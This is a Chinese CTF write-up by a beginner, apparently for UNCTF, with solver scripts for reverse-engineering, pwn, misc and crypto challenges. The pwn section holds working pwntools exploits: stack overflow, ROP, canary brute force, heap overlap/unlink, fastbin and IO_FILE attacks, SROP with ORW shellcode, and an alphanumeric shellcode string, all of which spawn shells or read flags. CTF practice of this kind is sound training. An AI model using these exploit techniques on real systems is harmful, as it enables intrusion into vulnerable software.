web RE PWN Crypto misc 新手 求带
RE
fackre
这个当时 没有做出来 去看牙了,,,,, 最后复现出来了。,。
直接看脚本
from Crypto.Util.number import *
#import gmpy2
import binascii
import hashlib
lists=[0x1b,0x5d,0x42,0x2b,0xd,0x5,0x48,0xe6,0x35,0x16,0x9e,0xb5,0xbb,0xe3,0x24,0xf,0x13,0xc0,0x59,0x96,0x5a,0x12,0x2b,0xe0,0x8f,0x21,0x8c,0x52,0xde,0x92,0x12,0x84,0xa3,0xe2,0x6e,0x7b,0x76,0xa2,0xf,0x51,0x93,0xa9,0x78,0xab,0x5f,0x5e,0x16,0x82,0x72,0x82,0x26,0xd1,0x26,0xd4,0x9,0xbf,0x74,0xda,0xa7,0x3e,0x99,0x2,0x65,0xc3,0xb3,0xad,0xe0,0x5a,0xab,0x7a,0x83,0x93,0x3f,0xa4,0x11,0x3d,0x8e,0xd,0xdf,0x5a,0x71,0x8,0x3a,0xc8,0xf4,0x90,0x16,0x1b,0x88,0xc6,0x50,0x6f,0xd1,0xa4,0xb3,0x73,0x7b,0x82,0xbf,0xb2,0x5f,0x94,0xde,0xca,0x5a,0x5e,0xab,0x25,0xbe,0x8c,0x1b,0x80,0x65,0x9e,0xec,0x5a,0x37,0x2a,0x75,0x2c,0x2d,0xba,0x56,0xd0,0xba,0x3a,0xb6,0x94,0x81,0x70,0x87,0x75,0x3d,0x48,0x63,0x7d,0x52,0x81,0x39,0xb5,0x23,0xd4,0xd3,0xdd,0x4b,0xd9,0xb8,0x35,0xa3,0xca,0x40,0x77,0x52,0x7c,0x9e,0x6c,0x42,0xd8,0x53,0x6f,0xea,0x2e,0xc,0x9a,0xf3,0x2a,0x6a,0xd5,0xea,0x6b,0x93,0x2f,0x18,0x5c,0xbe,0x96,0xb4,0x26,0xf,0xdb,0x9f,0x7,0x30,0xaf,0x93,0x34,0x27,0x8e,0xa,0xca,0x53,0xb7,0xc9,0x8f,0x9b,0x40,0x87,0x54,0x50,0x53,0x1e,0x55,0x6,0x4,0x87,0xc9,0x5e,0x78,0xa0,0x3f,0x66,0x8,0xb0,0x9,0x6e,0x83,0xe5,0x6c,0x23,0xe6,0x74,0x83,0x1,0xa4,0x7f,0x62,0x39,0x9,0x94,0x32,0xd3,0x88,0x93,0x61,0xc2,0xc6,0x61,0x6b,0x28,0xc7,0x61,0xdd,0xdb,0x90,0xa9,0xd5,0xd8,0x8a,0xa4,0xa0,0x65,0xc1,0x35,0x41,0xba,0xcf,0x4a,0x47,0xca,0xaf,0x51,0xe1,0x72,0x5a,0xbf,0x1e,0xb3,0x7a,0x80,0xf2,0x7a,0xcb,0x25,0xe6,0x98,0x96,0x1b,0x53,0x44,0xd8,0x3c,0xac,0x12,0xb1,0x64,0x47,0x35]
def rol_4(value,count):
nbits=32
count%=nbits
high = value >> (nbits - count)
value <<= count
value|=high
return value&0xffffffff
def ror_4(value,count):
nbits=32
count%nbits
high=value>>count
value<<=(nbits - count)
value|=high
return value&0xffffffff
def re_table(a1):
#print hex(a1)
#print hex(a1&0xff),hex((a1>>8)&0xff),hex((a1>>16)&0xff),hex((a1 >> 24)&0xff)
v1=(lists[((a1>>16)&0xff)] << 16) | (lists[((a1>>8)&0xff)] << 8) | (lists[a1&0xff]) | (lists[(a1 >> 24)&0xff] << 24)
v2 = ror_4(v1, 6)
v3 = ror_4(v1, 8) ^ v2
v4 = rol_4(v1, 10) ^ v3
return v4 ^ rol_4(v1, 12)
a1=0xCC227F52
a2=0x5227AA48
a3=0x34725FD0
a4=0x0F276B39
if __name__ =="__main__":
#print hex((ror_4(0x12345678,8)))
for i in range(0x1d-4+1):
s=a4^re_table(a1^a2^a3)
#print hex(s)
a4=a3
a3=a2
a2=a1
a1=s
#print hex(a1),hex(a2),hex(a3),hex(a4)
flag_s=a1.to_bytes(4, 'little')
flag_s+=a2.to_bytes(4, 'little')
flag_s+=a3.to_bytes(4, 'little')
flag_s+=a4.to_bytes(4, 'little')
flag="UNCTF{"
for i in flag_s:
flag+=chr(i)
flag_t="-Wh4t_aB0ut_yoU233?}"
flag+=flag_t
print(flag)
#print binascii.unhexlify(flag)
666:
就是一个简单的异或移位算法 逆推回去就可以了
key=0x12
cmpstr='izwhroz""w"v.K".Ni'
flag=""
for i in range(0,key,3):
flag+=chr((ord(cmpstr[i])^key)-6)
flag+=chr((ord(cmpstr[i+1])^key)+6)
flag+=chr((ord(cmpstr[i+2])^key)^6)
print flag
世界上最好的xor
动态就有flag。。。
Checkhex
就是一个stringtohex。。。
Easy maze
一个简单的maze 题目
地图可以动态直接拿,,
然后简单的bfs就可以拿到flag。。
#include<stdio.h>
#include<string.h>
#include<algorithm>
#include<vector>
#include<iostream>
#include<map>
#include<time.h>
#include<queue>
using namespace std;
int s[7][7]={
1,0,0,1,1,1,1,
1,0,1,1,0,0,1,
1,1,1,0,1,1,1,
0,0,0,1,1,0,0,
1,1,1,1,0,0,0,
1,0,0,0,1,1,1,
1,1,1,1,1,0,1,
};
int hh[5]= {1,0,-1,0};//y
int kk[5]= {0,1,0,-1};//x
char w[5]={'d','s','a','w'};
//O 左 o右 0下 .上
bool vis[9][9];
struct code{
int x,y;
queue<char>l;
}as,ad;
bool pd(int i,int j)
{
if(i>=0&&i<7&&j>=0&&j<7&&!vis[i][j]&&s[i][j]!=0)
return 1;
return 0;
}
void slove()
{
memset(vis,0,sizeof(vis));
queue<code>qq;
as.x=0,as.y=0;
while(!as.l.empty())
as.l.pop();
qq.push(as);
while(!qq.empty())
{
ad=qq.front();
qq.pop();
// printf("%d %d\n",ad.x,ad.y);
if(ad.x==6&&ad.y==6)
{
while(!ad.l.empty())
{
printf("%c",ad.l.front());
ad.l.pop();
}
// printf("1\n");
// printf("\n");
}
for(int i=0; i<4; i++)
{
as=ad;
as.x=ad.x+kk[i];
as.y=ad.y+hh[i];
if(pd(as.x,as.y))
{
//printf("%d %d %c\n",as.x,as.y,w[i]);
as.l.push(w[i]);
qq.push(as);
vis[as.x][as.y]=1;
}
}
}
}
int main()
{
slove();
return 0;
}
Easy vm
动态走几遍就ok了,具体看脚本== =
ls =[
0xF4,0x0A,0xF7,0x64,0x99,0x78,0x9E,0x7D,0xEA,0x7B,0x9E,0x7B,0x9F,0x7E,0xEB,0x71,
0xE8,0x00,0xE8,0x07,0x98,0x19,0xF4,0x25,0xF3,0x21,0xA4,0x2F,0xF4,0x2F,0xA6,0x7C
]
flag=""
for i in range(31,-1,-1):
temp = ls[i]
temp^=0xCD
if i==0:
count=0
else:
count = ls[i - 1]
temp^=count
temp += i
flag+=chr(temp)
print flag[::-1]
Easy android
这个题目函数逻辑很清楚。
就是简单的异或 然后对比md5值
去md5网站直接解不行, 因为这里是可见字符 异或 一个字符串内容 才md5的
所以 还是python 直接暴力可行 4位一组 很好爆破
#coding:utf-8
import hashlib
import string
# bd1d6ba7f1d3f5a13ebb0a75844cccfa
'''
fake_str='flag{this_is_a_fake_flag_ahhhhh}'
a = "2061e19de42da6e0de934592a2de3ca0"
b = "a81813dabd92cefdc6bbf28ea522d2d1"
c = "4b98921c9b772ed5971c9eca38b08c9f"
d = "81773872cbbd24dd8df2b980a2b47340"
e = "73b131aa8e4847d27a1c20608199814e"
f = "bbd7c4e20e99f0a3bf21c148fe22f21d"
gg = "bf268d46ef91eea2634c34db64c91ef2"
h = "0862deb943decbddb87dbf0eec3a06cc"
l=string.printable
flag=""
'''
'''for i in l:
for j in l:
for k in l:
for g in l:
flag=chr(ord(i)^ord('f'))
flag+=chr(ord(j)^ord('l'))
flag+=chr(ord(k)^ord('a'))
flag+=chr(ord(g)^ord('g'))
checkcode = hashlib.md5(flag).hexdigest()
if checkcode=="2061e19de42da6e0de934592a2de3ca0":
print (i+j+k+g)
'''
'''
sss=0
print "[*]2"
for i in l:
for j in l:
for k in l:
for g in l:
flag=chr(ord(i)^ord(fake_str[sss*4+4]))
flag+=chr(ord(j)^ord(fake_str[sss*4+5]))
flag+=chr(ord(k)^ord(fake_str[sss*4+6]))
flag+=chr(ord(g)^ord(fake_str[sss*4+7]))
checkcode = hashlib.md5(flag).hexdigest()
if checkcode==b:
print (i+j+k+g)
sss=sss+1
print "[*]3"
for i in l:
for j in l:
for k in l:
for g in l:
flag=chr(ord(i)^ord(fake_str[sss*4+4]))
flag+=chr(ord(j)^ord(fake_str[sss*4+5]))
flag+=chr(ord(k)^ord(fake_str[sss*4+6]))
flag+=chr(ord(g)^ord(fake_str[sss*4+7]))
checkcode = hashlib.md5(flag).hexdigest()
if checkcode==c:
print (i+j+k+g)
sss=sss+1
print "[*]4"
for i in l:
for j in l:
for k in l:
for g in l:
flag=chr(ord(i)^ord(fake_str[sss*4+4]))
flag+=chr(ord(j)^ord(fake_str[sss*4+5]))
flag+=chr(ord(k)^ord(fake_str[sss*4+6]))
flag+=chr(ord(g)^ord(fake_str[sss*4+7]))
checkcode = hashlib.md5(flag).hexdigest()
if checkcode==d:
print (i+j+k+g)
sss=sss+1
print "[*]5"
for i in l:
for j in l:
for k in l:
for g in l:
flag=chr(ord(i)^ord(fake_str[sss*4+4]))
flag+=chr(ord(j)^ord(fake_str[sss*4+5]))
flag+=chr(ord(k)^ord(fake_str[sss*4+6]))
flag+=chr(ord(g)^ord(fake_str[sss*4+7]))
checkcode = hashlib.md5(flag).hexdigest()
if checkcode==e:
print (i+j+k+g)
sss=sss+1
print "[*]6"
for i in l:
for j in l:
for k in l:
for g in l:
flag=chr(ord(i)^ord(fake_str[sss*4+4]))
flag+=chr(ord(j)^ord(fake_str[sss*4+5]))
flag+=chr(ord(k)^ord(fake_str[sss*4+6]))
flag+=chr(ord(g)^ord(fake_str[sss*4+7]))
checkcode = hashlib.md5(flag).hexdigest()
if checkcode==f:
print (i+j+k+g)
'''
#sss=sss+1
'''
print "[*]7"
for i in l:
for j in l:
for k in l:
for g in l:#_ahh
flag=chr(ord(i)^ord('_'))
flag+=chr(ord(j)^ord('a'))
flag+=chr(ord(k)^ord('h'))
flag+=chr(ord(g)^ord('h'))
checkcode = hashlib.md5(flag).hexdigest()
if checkcode==gg:
print (i+j+k+g)
'''
'''
for i in l:
for j in l:
for k in l:
for g in l:
flag=chr(ord(i)^ord('h'))
flag+=chr(ord(j)^ord('h'))
flag+=chr(ord(k)^ord('h'))
flag+=chr(ord(g)^ord('}'))
checkcode = hashlib.md5(flag).hexdigest()
if checkcode==h:
print (i+j+k+g)
奇妙的RTF
这个题目有提示
OFFICE 2017年某CVE 百度一下就知道了是哪个,,
So 找到点
拿到flag
没事 不难
这个题目 有个坑点 就是 要找到程序真正的计算的地方。
里面是一个有点难搞的算法
写一个脚本 搞出来就可以了
flag=""
l=[0x0B3,0x9C,0x0B7,0x0BF,0x0B2,0x0CB,0x0D3,0x0BF,0x0B2,0x0CB,0x0D3,0x0C9,0x0B1,0xcb,0x0D3,0x0BB,0x0AE,0x0AD,0x0A3,0x0CF,0x0AD,0x0CD,0x9F,0x0BB]
for i in range(6):
s=[]
for j in range(3,-1,-1):
temp=l[i*4+j]-0x96
for k in range(6):
s.append(temp%2)
temp=temp/2
temp=0
print len(s)
bits=128
count=0
for k in range(len(s)-1,-1,-1):
temp=temp+s[k]*bits
bits=bits/2
count+=1
if count==8:
count=0
bits=128
flag+=chr(temp)
temp=0
print flag
PWN:
Soso easy pwn
直接栈溢出就可以 只不过 需要爆破一位 16分之1的几率
# -*- coding: utf-8 -*-
from pwn import *
context.log_level='debug'
if __name__ =="__main__":
while True :
try:
io=process('./pwn')
elf=ELF('./pwn')
io.recv(16)
addr=int(io.recv(5))
#print hex(addr)
back_door=int(hex(addr)+'a'+'9cd',16)
log.success("back_door "+hex(back_door))
payload='a'*0xc+p32(back_door)
io.send(payload)
sleep(0.1)
io.recv()
io.sendline('0')
io.recv()
#io.recv()
except EOFError:
io.close()
else:
io.interactive()
Orw:
Orw的题目。。
# -*- coding: utf-8 -*-
from pwn import *
context.log_level='debug'
def add(size,content):
io.recvuntil("Your Choice: ")
io.sendline('1')
io.recvuntil("size: ")
io.sendline(str(size))
io.recvuntil("content: ")
io.sendline(content)
def delete(index):
io.recvuntil("Your Choice: ")
io.sendline('2')
io.recvuntil("idx: ")
io.sendline(str(index))
def edit(index,content):
io.recvuntil("Your Choice: ")
io.sendline('3')
io.recvuntil("idx: ")
io.sendline(str(index))
io.recvuntil("content: ")
io.sendline(content)
#io=remote('101.71.29.5',10005)
#libc=ELF('./x64_libc.so.6')
if __name__ =="__main__":
io=process('./pwn_heap')
elf=ELF('./pwn_heap')
libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
add(0x68,'')
add(0x78,'')
add(0x68,(p64(0)+p64(0x21))*6+'')
add(0x68,(p64(0)+p64(0x21))*6+'')
delete(0)
io.sendlineafter('Your Choice: ','1')
io.sendlineafter('size: ',str(0x68))
io.sendafter('content: ','a' * 0x60 + p64(0) + p8(0xf1))
delete(1)
delete(2)
add(0x78,'')
delete(0)
add(0x68,'a'*0x60+p64(0)+p8(0xa1))
delete(1)
add(0x98,'')
edit(1,'b'*0x70+p64(0)+p64(0x71)+p16(0x55dd))
add(0x68,'')
add(0x68,'c'*0x33+p64(0xfbad2887|0x1000)+p64(0)*3)
data=io.recvuntil('\xff\xff\xff\xff\xff\xff\xff\xff')
address=u64(data[0x88:0x90])
libc_addr=address-libc.symbols['_IO_2_1_stdin_']
success('libc_base:'+hex(libc_addr))
pause()
edit(1,'b'*0x70+p64(0)+p64(0x91))
delete(2)
edit(1,'b'*0x70+p64(0)+p64(0x91)+p64(0)+p64(libc_addr+libc.symbols['__free_hook']-0x20))
add(0x88,'')
#fastbinattack
edit(1,'b'*0x70+p64(0)+p64(0x71))
delete(2)
edit(1,'b'*0x70+p64(0)+p64(0x71)+p64(libc_addr+libc.symbols['__free_hook']-0x13))
frame=SigreturnFrame()
frame.rdi=0
frame.rsi=(libc_addr+libc.symbols['__free_hook'])&0xfffffffffffff000#
frame.rdx=0x2000
frame.rsp=(libc_addr+libc.symbols['__free_hook'])&0xfffffffffffff000
frame.rip=libc_addr+0x00000000000bc375#:syscall;ret;-->rcx
payload=str(frame)
add(0x68,payload[0x80:0x80+0x60])
add(0x68,'fff'+p64(libc_addr+libc.symbols['setcontext']+53))
edit(1,payload[:0x98])
delete(1)
layout=[
libc_addr+0x0000000000021102,#:poprdi;ret;
(libc_addr+libc.symbols['__free_hook'])&0xfffffffffffff000,
libc_addr+0x00000000000202e8,#:poprsi;ret;
0x2000,
libc_addr+0x0000000000001b92,#:poprdx;ret;
7,
libc_addr+0x0000000000033544,#:poprax;ret;
10,
libc_addr+0x00000000000bc375,#:syscall;ret;
libc_addr+0x0000000000002a71,#:jmprsp;
]
shellcode=asm('''
sub rsp, 0x800
push 0x67616c66
mov rdi, rsp
xor esi, esi
mov eax, 2
syscall
cmp eax, 0
js failed
mov edi, eax
mov rsi, rsp
mov edx, 0x100
xor eax, eax
syscall
mov edx, eax
mov rsi, rsp
mov edi, 1
mov eax, edi
syscall
jmp exit
failed:
push 0x6c696166
mov edi, 1
mov rsi, rsp
mov edx, 4
mov eax, edi
syscall
exit:
xor edi, edi
mov eax, 231
syscall
''')
io.send(flat(layout)+shellcode)
#pause()
'''
io.sendline("1")
io.sendline("1")'''
io.interactive()
Driver
堆重叠+unlink
from pwn import*
context.log_level='debug'
context.arch='amd64'
def buy(choice,name):
io.recvuntil('Your Choice>> \n')
io.sendline('1')
io.recvuntil('Your Choice>> \n')
io.sendline(str(choice))
io.recvuntil('name: ')
io.sendline(name)
def dele(index):
io.recvuntil('Your Choice>> \n')
io.sendline('3')
io.recvuntil('index: ')
io.sendline(str(index))
def edit(index,name):
io.recvuntil('Your Choice>> \n')
io.sendline('4')
io.recvuntil('index: ')
io.sendline(str(index))
io.recvuntil('name: ')
io.send(name)
def edit1(index,name):
io.recvuntil('Your Choice>> \n')
io.sendline('6')
io.recvuntil('index: ')
io.sendline(str(index))
io.recvuntil('name: ')
io.send(name)
def drive(index,con):
io.recvuntil('Your Choice>> \n')
io.sendline('5')
io.recvuntil('index: ')
io.sendline(str(index))
io.recv()
io.sendline('1')
io.recvuntil('Your Choice>> \n')
io.sendline(str(con))
def drive1(index):
io.recvuntil('Your Choice>> \n')
io.sendline('5')
io.recvuntil('index: ')
io.sendline(str(index))
io.recv()
io.sendline('2')
io=process('./driver')
elf=ELF('./driver')
libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
if __name__ =="__main__":
io.recvuntil('Your Choice>> \n')
io.sendline('8')
io.recv(8)
heap_addr=int(io.recv(12),16)-0x10
success('heap_addr:'+hex(heap_addr))
buy(2,'a')
buy(2,'a')
dele(0)
buy(1,'a')
buy(2,'a')
dele(0)
dele(2)
dele(1)
buy(2,'a')
buy(1,'a')
drive(1,2)
malloc_hook_addr=int(io.recvuntil("Km")[:-2])/2-88-0x10
libc_base=malloc_hook_addr-libc.sym['__malloc_hook']
success('libc_base '+hex(libc_base))
buy(2,'a')
dele(0)
dele(1)
dele(2)
buy(2,'a')
buy(2,'a')
buy(3,'a'*0x1f0+p64(0x200)+p64(0x31))
edit(1,'a'*0xf0+p64(0x330))
dele(0)
dele(2)
buy(3,'\x00'*0xf8+p64(0x21)+p64(0xc8)+p64(1)+p64(0)+p64(0xf8)+p64(0)+p64(heap_addr+0x10))
dele(1)
buy(1,'a')
dele(0)
buy(3,'\x00'*0xf8+p64(0x21)+p64(heap_addr)+'\x00'*0x30+p64(0x41)+p64(0x100)+'\x00'*0x10+p64(0x220)+p64(0)+p64(heap_addr+0x30)+p64(0)+p64(0x21)+'\x00'*0x68+p64(0x41)+p64(0x64)+p64(0)+p64(0)+p64(0x68)+p64(0)+p64(heap_addr+0x10)[:-2])
dele(1)
buy(1,'1')
edit1(0,'\x00'*0xf8+p64(0x21)+p64(heap_addr)+'\x00'*0x70+p64(0x21)+'\x00'*0x68+p64(0x41)+p64(0x64)+p64(0)+p64(0)+p64(0x68)+p64(0)+p64(libc_base+libc.sym['__malloc_hook']))
edit1(1,p64(libc_base+0x4526a))
io.sendline("1")
sleep(0.5)
io.sendline("1")
io.interactive()
Shellocde
这就体验到了 谷歌等搜索能力,,
找到一个64位的符合shllcode 是多么的不容易,
import io
from pwn import*
context.log_level='debug'
context.arch='amd64'
io=process('./shellcode')
elf=ELF('./shellcode')
libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
if __name__ =="__main__":
io.recv()
io.sendline('Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M154J0S0X2K0W1M0D7p0F0z3V110b154y33164F0Z0D0h0u063O3f0y4y4D1k110n0H3c7l045O3f2n4y5L0Z0E0o3q3X0z0506')#\x0f\x05
io.interactive()
Babyrop
就。。。很简单的rop题目
from pwn import*
context.log_level='debug'
io=process('./babyrop')
elf=ELF('./babyrop')
libc=ELF('/lib/i386-linux-gnu/libc-2.23.so')
if __name__ =="__main__":
io.recvuntil("Hello CTFer!")
payload='a'*0x20+p32(0x66666666)
main_addr=0x08048592
io.sendline(payload)
io.recvuntil("What is your name?")
io.sendline('a'*0x14+p32(elf.plt['puts'])+p32(main_addr)+p32(elf.got['puts']))
io.recv()
libc_base=u32(io.recv()[:4])-libc.sym['puts']
success('libc_base:'+hex(libc_base))
io.sendline(payload)
io.recv()
bin_sh_addr=libc_base+libc.search("/bin/sh").next()
io.sendline('a'*0x14+p32(0x0804839e)+p32(libc_base+libc.sym['system'])+p32(main_addr)+p32(bin_sh_addr))
io.interactive()
easy_stack
这个题目给了四次的机会 然后因为 32位的canary 最低位是0x00
所以我们只需要爆破三个字节 然后 最后一次直接getshell 就ok了
from pwn import*
context.log_level='debug'
if __name__ =="__main__":
io=process('./easystack')
elf=ELF('./easystack')
libc=ELF('/lib/i386-linux-gnu/libc-2.23.so')
io.recvuntil("How much do you want to calc: ")
io.sendline('301')
for i in range(1,256):
io.recvuntil("num?(Input 0 to stop): ")
io.sendline(str(i*0x1000000))
for i in range(44):
io.recvuntil("num?(Input 0 to stop): ")
io.sendline(str(0xff000000))
io.recv()
io.sendline('0')
io.recv(10)
canary =(255-(int(io.recv(3))-299-44))<<24
io.recv()
io.sendline('n')
io.recvuntil("How much do you want to calc: ")
io.sendline('301')
for i in range(1,256):
io.recvuntil("num?(Input 0 to stop): ")
io.sendline(str((i<<16)+canary))
#io.sendlineafter('num?(Input 0 to stop): ',str((i<<16)+canary))
for i in range(44):
io.recvuntil("num?(Input 0 to stop): ")
io.sendline(str(0xffff0000))
#io.sendlineafter('num?(Input 0 to stop): ',str(0xffff0000))
io.recv()
io.sendline('0')
io.recv(10)
canary+=(255-(int(io.recv(3))-299-44))<<16
io.recv()
io.sendline('n')
io.recvuntil("How much do you want to calc: ")
io.sendline('301')
for i in range(1,256):
io.recvuntil("num?(Input 0 to stop): ")
io.sendline(str((i<<8)+canary))
for i in range(44):
io.recvuntil("num?(Input 0 to stop): ")
io.sendline(str(0xffffff00))
io.recv()
io.sendline('0')
io.recv(10)
canary+=(255-(int(io.recv(3))-299-44))<<8
#print hex(canary)
#pause()
io.recv()
stream_addr=0x08048750
cout_addr=0x0804A0C0
main_addr=0x080488E7
io.sendline('n')
io.recvuntil("How much do you want to calc: ")
io.sendline('320')
for i in range(300):
io.recvuntil("num?(Input 0 to stop): ")
io.sendline('1')
io.recvuntil("num?(Input 0 to stop): ")
io.sendline(str(canary))
for i in range(3):
io.recvuntil("num?(Input 0 to stop): ")
io.sendline('1')
io.recvuntil("num?(Input 0 to stop): ")
io.sendline(str(stream_addr))
io.recvuntil("num?(Input 0 to stop): ")
io.sendline(str(main_addr))
io.recvuntil("num?(Input 0 to stop): ")
io.sendline(str(cout_addr))
io.recvuntil("num?(Input 0 to stop): ")
io.sendline(str(elf.got['setbuf']))
io.recvuntil("num?(Input 0 to stop): ")
io.sendline('0')
io.recv(10)
io.recv(3)
io.sendline('n')
io.recv()
libc_base=u32(io.recv(4))-libc.sym['setbuf']
log.success("libc_base "+hex(libc_base))
pause()
io.sendline('320')
for i in range(300):
io.recvuntil("num?(Input 0 to stop): ")
io.sendline('1')
io.recv(timeout=0.1)
io.sendline(str(canary))
for i in range(3):
io.recvuntil("num?(Input 0 to stop): ")
io.sendline('1')
bin_sh_addr=libc_base+libc.search("/bin/sh").next()
system_addr=libc_base+libc.sym['system']
io.recvuntil("num?(Input 0 to stop): ")
io.sendline(str(system_addr))
io.recvuntil("num?(Input 0 to stop): ")
io.sendline(str(1))
io.recvuntil("num?(Input 0 to stop): ")
io.sendline(str(bin_sh_addr))
io.recvuntil("num?(Input 0 to stop): ")
io.sendline(str(0))
pause()
io.interactive()
Box 有一个任意修改的指针 直接修改io file
from pwn import*
context.log_level='debug'
context.arch='amd64'
def add(ids,size):
io.recvuntil('Your Choice: ')
io.sendline('1')
io.recvuntil('Box ID: ')
io.sendline(str(ids))
io.recvuntil('Size: ')
io.sendline(str(size))
def edit(ids,con):
io.recvuntil('Your Choice: ')
io.sendline('2')
io.recvuntil('Box ID: ')
io,sendline(str(ids))
io.recvuntil('Box Content: ')
io.send(con)
def dele(ids):
io.recvuntil('Your Choice: ')
io.sendline('3')
io.recvuntil('Box ID: ')
io,sendline(str(ids))
if __name__ =="__main__":
io=process('./Box')
elf=ELF('./Box')
libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
edit(-27,'\x90')
edit(-27,p64(0x88))
edit(-12,p64(0x1800)+p64(0)*3+'\x88')
libc_base=u64(io.recv(8))-libc.sym['_IO_2_1_stdin_']
success('libc_base:'+hex(libc_base))
edit(-27,p64(libc_base+libc.sym['__free_hook'])+p64(0x68))
edit(-10,p64(libc_base+0x4526a))
add(0,0x68)
dele(0)
io.interactive()
Babyheap
from pwn import*
context.log_level='debug'
def add(content):
io.recvuntil("Your choice: ")
io.sendline('1')
io.recvuntil('content: ')
io.sendline(content)
def dele(index):
io.recvuntil("Your choice: ")
io.sendline('4')
io.recvuntil("index: ")
io.sendline(str(index))
def edit(index,size,content):
io.recvuntil("Your choice: ")
io.sendline('2')
io.recvuntil("index: ")
io.sendline(str(index))
io.recvuntil('size: ')
io.sendline(str(size))
io.recvuntil('content: ')
io.sendline(content)
def show(index):
io.recvuntil("Your choice: ")
io.sendline('3')
io.recvuntil("index: ")
io.sendline(str(index))
if __name__ =="__main__":
io=process('./baby_heap')
elf=ELF('./baby_heap')
libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
add('a'*0x10)
edit(0,0x18,'/bin/sh;'+'a'*0x10)
show(0)
io.recv(0x18)
libc_base=u64(io.recv(6)+'\x00\x00')-libc.sym['puts']
success('libc_base:'+hex(libc_base))
edit(0,0x20,'/bin/sh\x00'+'a'*0x10+p64(libc_base+libc.sym['system']))
show(0)
#gdb.attach(io)
#pause()
io.interactive()
MISC:
抓猫猫
玩游戏就 get flag
亲爱的
可以分离一个压缩包,
然后 压缩包注释,
qmusic 2019.7.27 17:47
嗯, 亲爱的 热爱的 李现版的海阔天空
然后找到 这个时间点的评论 真的上头 解压 拿到flag
嗯 翻了好久的我
Hide secret
分离发现一个文件 但是 损坏 用010看 发现头部 像压缩包 但是是 0304 试着 加了补上50 4B 补上 压缩包的魔数 试了试 发现可以
binwalk 1.jpg后分离出1.txt
得到一串
最后发现是base92解密.。。
解密就得出flag
信号不好我先挂了
这个是是合并的watermark
直接分离后
数独
是一个数独题目 一开始一直跑不出来,, 最后才知道 是这个题目少了一些限制,
bfs 就可以做 = = =
直接bfs一把梭
import datetime
from pwn import *
import copy
context.log_level = 'DEBUG'
global sum
l=[]
list2 = []
list3 = []
def pd(lens,v):
for i in range(9):
if list3[i][l[lens]%100]==v or list3[l[lens]/100][i]==v:
return 0
x=((l[lens]/100)/3)*3
y=((l[lens]%100)/3)*3
'''for i in range(x,x+3):
for j in range(y,y+3):
if list3[i][j]==v:
return 0'''
return 1
def dfs(lens):
print lens,sum
#print l
#print list3
if lens==sum:
for i in range(9):
str_end = ''
for j in range(9):
if(list2[i][j]==0):
str_end += str(list3[i][j])+(',')
io.sendline(str_end[:-1])
io.recvuntil('answer :\n')
io.interactive()
for i in range(1,10):
if pd(lens,i)==1:
list3[l[lens]/100][l[lens]%100]=i
dfs(lens+1)
list3[l[lens]/100][l[lens]%100]=0
if __name__ =="__main__":
sum=0
for i in range(100):
l.append(0)
print l
io=remote('101.71.29.5',10011)
io.recvuntil('commas.')
list1 = io.recvline()
for i in range(9):
list1 = io.recvline()
list1 = io.recvline()
list1 = list1.strip().split('|')[1:10]
list2.append(list1)
#print list2
for i in range(9):
for j in range(9):
if list2[i][j]=='' or list2[i][j]==' ':
list2[i][j]=0
else:
list2[i][j] = int(list2[i][j])
list3 = copy.deepcopy(list2)
#print list3
io.recvuntil('Please input row 1 answer :')
for i in range(9):
for j in range(9):
if list3[i][j]==0:
l[sum]=i*100+j
sum+=1
dfs(0)
Crypto
不仅仅是rsa
同一个q 求最大公因数就可以 = =
from Crypto.Util.number import *
import gmpy2
import binascii
p1=0xedbaab62d8b87c8f859dbea7981dc275fb080c66d4af11e2da21338133c8bfc1
q=0xd37984ec7c84c7a7e3326c0ef1ecc543abb78854f1c64927bc97ac4abcf1933b
p2=0xc5d721ad63a259550a062d26758e5a8a80135d07ee8b997ae608f131eb6234c9
e=41221
C1=4314251881242803343641258350847424240197348270934376293792054938860756265727535163218661012756264314717591117355736219880127534927494986120542485721347351
C2=485162209351525800948941613977942416744737316759516157292410960531475083863663017229882430859161458909478412418639172249660818299099618143918080867132349
n1=0xC461B3ED566F2D68583019170BDD5263D113BAECE3DEE6631F08A166376AC41FF5D4E90B3330E0FC26993E3B353F38F9B6B880DFBC5807636497561B7611047B
n2=0xA36E3A2A83FE2C1E33F285A08C3ECD36E377F4D9FFE828E2426D3ECED0A7F947631E932AEC327555511AC6D71E72686C1CB7DBBF3859A4D9A3D344FBF12A9553
phi=(p1-1)*(q-1)
d=gmpy2.invert(e,phi)
phi=(p2-1)*(q-1)
d2=gmpy2.invert(e,phi)
m=pow(C1,d,n1)
mm=pow(C2,d2,n2)
m=hex(m)
mm=hex(mm)
a=str(m)[2:]+str(mm)[2:]
print binascii.unhexlify(a)
一句话加密
这个n 在图像的最后
这个kobe 真的误导了我= == 让我一直以为 e是81,。
后来我发现这个题目的n是另一道题的n,,,那个题目的e是2.。。
然后我用RSAtools 试了一下。。
发现确实是。。。
ECC
这个题目一开始没有看出来是什么情况 , 然后搞得我很懵逼,,
E=EllipticCurve(GF(15424654874903),[16546484,4548674875])
G=E(6478678675, 5636379357093)
k=???????
K=k*G
#K=(2854873820564,9226233541419)
aes_key=???????
x=aes_key
M=E.lift_x(x)
r=?????????
C1=M+r*K
x1,y1=C1.xy()
C2=r*G
x2,y2=C2.xy()
print 'C1(%d,%d),C2(%d,%d)'%(x1,y1,x2,y2)
#output£º
C1(6860981508506,1381088636252),C2(1935961385155,8353060610242)
后来 恶补了一波 但是原理还是有点懵b
但是最后还是安装了这个工具 看了题解
直接用真的爽,
E=EllipticCurve(GF(15424654874903),[16546484,4548674875])
G=E(6478678675, 5636379357093)
K=E(2854873820564,9226233541419)
k=G.discrete_log(K)
print 'k:%d'%(k)
C1=E(6860981508506,1381088636252)
C2=E(1935961385155,8353060610242)
M=C1-k*C2
aes_key,y=M.xy()
print 'aes_key:%d'%aes_key
print 'y:%d'%y这个 运行出结果
跑出来key 之后就很简单了
直接运行脚本就出来了
from Crypto.Cipher import AES
import base64
key="1026".ljust(16,' ').encode("utf-8")
#print(ases)
#key = (ases.ljust(16,' '))
aes = AES.new(key,AES.MODE_ECB)
text_enc_b64 = base64.b64decode('/cM8Nx+iAidmt6RiqX8Vww==')
text_enc = aes.decrypt(text_enc_b64)
print(text_enc)
Web
帮赵总结婚
